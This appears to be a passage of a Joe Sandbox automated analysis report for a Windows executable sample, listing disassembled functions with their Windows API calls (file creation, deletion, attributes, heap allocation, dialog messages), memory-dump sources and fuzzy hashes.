                                                                    • Opcode Fuzzy Hash: 9ef3e1f6fd4dbd8ebece0bccad8f2a708e4d4a6c1470d64408921f0744a39119
                                                                    • Instruction Fuzzy Hash: E2F0243564231DFFCB106FA4CD05DEDBFA1DF18710B004029FC0557260DA318A109BB5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Alloc
                                                                    • String ID: FlsAlloc
                                                                    • API String ID: 2773662609-671089009
                                                                    • Opcode ID: 9e973d1b7aa6e06a9009c0f72af36b500b0cada628c35781391195527b6b0165
                                                                    • Instruction ID: f30e8a26b13b64c62aa9f90f4509ee4633d072a60827862f0458ebea0491adba
                                                                    • Opcode Fuzzy Hash: 9e973d1b7aa6e06a9009c0f72af36b500b0cada628c35781391195527b6b0165
                                                                    • Instruction Fuzzy Hash: DDE0E530A4131EFB86146BA89C16EADBB67CB58B20B410169F80697340DD719D0196BA
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB10BA
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID: 3To
                                                                    • API String ID: 1269201914-245939750
                                                                    • Opcode ID: 154fa0ad7f91f7be9f9756bd254bca71aad5d54cfaedd5bc55ca9ab869f629eb
                                                                    • Instruction ID: 263ce6dd1c471974113a1942cdf7e7f37f0a1564629dae0f3135e3339b84d903
                                                                    • Opcode Fuzzy Hash: 154fa0ad7f91f7be9f9756bd254bca71aad5d54cfaedd5bc55ca9ab869f629eb
                                                                    • Instruction Fuzzy Hash: F5B012E539C101FC32143344EC12CF7011DC5C0B10371CA2FF486C00C09940BDC90032
                                                                    APIs
                                                                      • Part of subcall function 00DBDE0B: GetOEMCP.KERNEL32(00000000,?,?,00DBE094,?), ref: 00DBDE36
                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00DBE0D9,?,00000000), ref: 00DBE2B4
                                                                    • GetCPInfo.KERNEL32(00000000,00DBE0D9,?,?,?,00DBE0D9,?,00000000), ref: 00DBE2C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CodeInfoPageValid
                                                                    • String ID:
                                                                    • API String ID: 546120528-0
                                                                    • Opcode ID: 36efa55ff6244b5a95162c95db99eb866bc457ae8ec2b3563488d61ad26acd1b
                                                                    • Instruction ID: 11eb2fb0e7baa7b41eff342dcdbe1092e22d95a354b9c9d0b58a14c78a739f54
                                                                    • Opcode Fuzzy Hash: 36efa55ff6244b5a95162c95db99eb866bc457ae8ec2b3563488d61ad26acd1b
                                                                    • Instruction Fuzzy Hash: CB510170904306DEDB249F75C8816FABBE5EF51301F18856ED0978B351E639E941CBB1
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,00D9B43B,00000800,00000800,00000000,?,?,00D9A31D,?), ref: 00D9B5EB
                                                                    • GetLastError.KERNEL32(?,?,00D9A31D,?,?,?,?,?,?,?,?), ref: 00D9B5FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: ccd8e50b7704d8ce9de500c38b6e57cc3a19930b3d4f508b8d4f9e7b36e3ba46
                                                                    • Instruction ID: 57ef547f661a993e9666773b632ed78659691892c8092567e24fe92049f418d3
                                                                    • Opcode Fuzzy Hash: ccd8e50b7704d8ce9de500c38b6e57cc3a19930b3d4f508b8d4f9e7b36e3ba46
                                                                    • Instruction Fuzzy Hash: D241C231604345CBDF64AF64E6849BAB3E5EF98334F16462BE48683241D7B4D8809BB1
                                                                    APIs
                                                                      • Part of subcall function 00DBB9A5: GetLastError.KERNEL32(?,00DD50C4,00DB6E12,00DD50C4,?,?,00DB688D,?,?,00DD50C4), ref: 00DBB9A9
                                                                      • Part of subcall function 00DBB9A5: _free.LIBCMT ref: 00DBB9DC
                                                                      • Part of subcall function 00DBB9A5: SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA1D
                                                                      • Part of subcall function 00DBB9A5: _abort.LIBCMT ref: 00DBBA23
                                                                      • Part of subcall function 00DBE19E: _abort.LIBCMT ref: 00DBE1D0
                                                                      • Part of subcall function 00DBE19E: _free.LIBCMT ref: 00DBE204
                                                                      • Part of subcall function 00DBDE0B: GetOEMCP.KERNEL32(00000000,?,?,00DBE094,?), ref: 00DBDE36
                                                                    • _free.LIBCMT ref: 00DBE0EF
                                                                    • _free.LIBCMT ref: 00DBE125
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorLast_abort
                                                                    • String ID:
                                                                    • API String ID: 2991157371-0
                                                                    • Opcode ID: 4180ccd01eff8df9b0ba4f1b94551678c80ec578e3c50bdfc8e16303fa975109
                                                                    • Instruction ID: 2861dcc2523a887bb5f8b4cad4d62548546c0bde9563a1db769cbcdf69aae12d
                                                                    • Opcode Fuzzy Hash: 4180ccd01eff8df9b0ba4f1b94551678c80ec578e3c50bdfc8e16303fa975109
                                                                    • Instruction Fuzzy Hash: D1318131904208EFDB10EFA9D441AE9BBF5EF55360F25409AF5069B291EBB29D41CB70
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D9B967,?,?,00D987FD), ref: 00D9B0A4
                                                                    • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D9B967,?,?,00D987FD), ref: 00D9B0D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 3b3023baad4a7f83a9cea262e1997c8cadbe39e99d73e1e87f11ab55eaba344e
                                                                    • Instruction ID: 27fee5786eabe641fb251c08624449c8e31f3e5e7f7f12b788e171ca370c8661
                                                                    • Opcode Fuzzy Hash: 3b3023baad4a7f83a9cea262e1997c8cadbe39e99d73e1e87f11ab55eaba344e
                                                                    • Instruction Fuzzy Hash: 29219E71504344AFE7309F24DD89BB7B7ECEB89320F454A1AF9E9C21D1D774A8448672
                                                                    APIs
                                                                    • FlushFileBuffers.KERNEL32(?), ref: 00D9B7FC
                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D9B8B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersFlushTime
                                                                    • String ID:
                                                                    • API String ID: 1392018926-0
                                                                    • Opcode ID: fde49ce17a29eddbd8f8bb0ff797d4c05a85d4356fb12f3567956709f5647c82
                                                                    • Instruction ID: e2d081e7a5fb06e730a166cad95c25d5fa2f045eb43b2085b1bb4e5de638eb5b
                                                                    • Opcode Fuzzy Hash: fde49ce17a29eddbd8f8bb0ff797d4c05a85d4356fb12f3567956709f5647c82
                                                                    • Instruction Fuzzy Hash: 9521D0312482429BCB15DF64D991ABABBE8AF59314F09491EF4C187141D329E90CD772
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3746244732-0
                                                                    • Opcode ID: b5ebb6fa192e9509045b3f43a6550bd8470383f656c5797864b65b0124d01dc2
                                                                    • Instruction ID: 1694f71951fa9bf291b258c7fa10aea92d30780f9f96e02892134779f8ccc874
                                                                    • Opcode Fuzzy Hash: b5ebb6fa192e9509045b3f43a6550bd8470383f656c5797864b65b0124d01dc2
                                                                    • Instruction Fuzzy Hash: 0E213835900219EFCF15AF94C895AEEBBB2FF08300F14042DF58AA72A1CB795A51DB74
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00DF60C8,?,?,?,00DB6386,00000004,InitializeCriticalSectionEx,00DC9624,InitializeCriticalSectionEx,00000000,?,00DB613D,00DF60C8,00000FA0), ref: 00DB6215
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00DB621F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID:
                                                                    • API String ID: 3013587201-0
                                                                    • Opcode ID: 058e7e515fe7205e2cfd03ed7238f7419f694949e664b6131dde2d53761e3238
                                                                    • Instruction ID: c18f62ecf25fe043e87db767b6eec4cff61674ec9537ef07317ee83447a06658
                                                                    • Opcode Fuzzy Hash: 058e7e515fe7205e2cfd03ed7238f7419f694949e664b6131dde2d53761e3238
                                                                    • Instruction Fuzzy Hash: F1118E35A00216DF9B22CFA8DC809EA77A5FB457A07280169EA57DB310E734DD01CBB4
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00D9B907
                                                                    • GetLastError.KERNEL32 ref: 00D9B914
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: 34d24cf9920c9c5d4fb631cacbd4d06e011df7f32819bafe230c4878fffac4df
                                                                    • Instruction ID: a1ea55a3b7bc856f8c5e342864b4708354c34608de19baacf1eb6e90346584a3
                                                                    • Opcode Fuzzy Hash: 34d24cf9920c9c5d4fb631cacbd4d06e011df7f32819bafe230c4878fffac4df
                                                                    • Instruction Fuzzy Hash: 2911E530A10711BFDB249629DD45B7673E9EB05370F55072AE252E22D0D770ED45DB70
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00DBBB55
                                                                      • Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0
                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00DD50C4,00D9190A,?,?,00000007,?,?,?,00D91476,?,00000000), ref: 00DBBB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocAllocate_free
                                                                    • String ID:
                                                                    • API String ID: 2447670028-0
                                                                    • Opcode ID: 66b13936cefae6acc363ea8a3a6975e8e7a5ff923486b92eccd92f42d618a80a
                                                                    • Instruction ID: a1752d7d19679f9b5c236fc1009d58579504229960f766693902923cc59fddd8
                                                                    • Opcode Fuzzy Hash: 66b13936cefae6acc363ea8a3a6975e8e7a5ff923486b92eccd92f42d618a80a
                                                                    • Instruction Fuzzy Hash: D1F09632600615EEDB216A66AC01FEF7B58DF81B70B284117F857961A5DFF0DC0191BD
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00D9BF5E,?,?), ref: 00D9C305
                                                                      • Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D9BF5E,?,?), ref: 00D9C334
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2673547680-0
                                                                    • Opcode ID: 98a761b56dcdfb38be2c9450ef9607bd24ff0570be7ad1b64210a58e8da220c1
                                                                    • Instruction ID: 5bae382a6efc8e62ff480132b8d2e34ba147bf8478bacc4de34957e382c58d21
                                                                    • Opcode Fuzzy Hash: 98a761b56dcdfb38be2c9450ef9607bd24ff0570be7ad1b64210a58e8da220c1
                                                                    • Instruction Fuzzy Hash: 46F0903560121AABDF00AF718C01AEE77ACEF08344F808096B901E7250EA31DE449B74
                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(?,?,?,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9BC82
                                                                      • Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?), ref: 00D9BCAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFile$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2643169976-0
                                                                    • Opcode ID: e4b826c794d367e3f8f0d740c8ae9ae524dd1f58867969394b95d5954f2d2f7c
                                                                    • Instruction ID: 361c4cc34b72e7cc00b0172f413f3bbc2ce8cb64afaa233808c7e0c3141c2f3d
                                                                    • Opcode Fuzzy Hash: e4b826c794d367e3f8f0d740c8ae9ae524dd1f58867969394b95d5954f2d2f7c
                                                                    • Instruction Fuzzy Hash: DBF05E3560122AABDB01EF749D45EEE73ACEF09751F444066BA01E3240DF71DE889BB4
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DB0341
                                                                      • Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13
                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00DB0358
                                                                      • Part of subcall function 00DAD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
                                                                      • Part of subcall function 00DAD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
                                                                      • Part of subcall function 00DAD864: IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
                                                                      • Part of subcall function 00DAD864: TranslateMessage.USER32(?), ref: 00DAD8A8
                                                                      • Part of subcall function 00DAD864: DispatchMessageW.USER32(?), ref: 00DAD8B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                    • String ID:
                                                                    • API String ID: 2718869927-0
                                                                    • Opcode ID: f109bc22b5b98ee6827288b7d4b3d95056ef994ccd269a687f1e864af3a04909
                                                                    • Instruction ID: 6c30e29f69c3667601c17ebc3a152e9887fc91b63f382aecbcb37faf417214d5
                                                                    • Opcode Fuzzy Hash: f109bc22b5b98ee6827288b7d4b3d95056ef994ccd269a687f1e864af3a04909
                                                                    • Instruction Fuzzy Hash: E7F0B471A11308AACB11FB79DD16EEF7BBCDB09304F440052B202E3292DA74AA05CBB1
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,00D9BCD4,?,00D98607,?), ref: 00D9BCFA
                                                                      • Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,00D9BCD4,?,00D98607,?), ref: 00D9BD24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2673547680-0
                                                                    • Opcode ID: b0feaa2efd473222b20349052f17c7acab105a8cc1f1860f97a05557426e91e9
                                                                    • Instruction ID: b10d4e1963898d7a7cc1f451964c0b99114ac5fdc7db64c7da860d50c0064071
                                                                    • Opcode Fuzzy Hash: b0feaa2efd473222b20349052f17c7acab105a8cc1f1860f97a05557426e91e9
                                                                    • Instruction Fuzzy Hash: 75F0B435600218ABCB10EB789D019FEB3BCEB4D760F050165FA02E3280DB70DD4186B0
                                                                    APIs
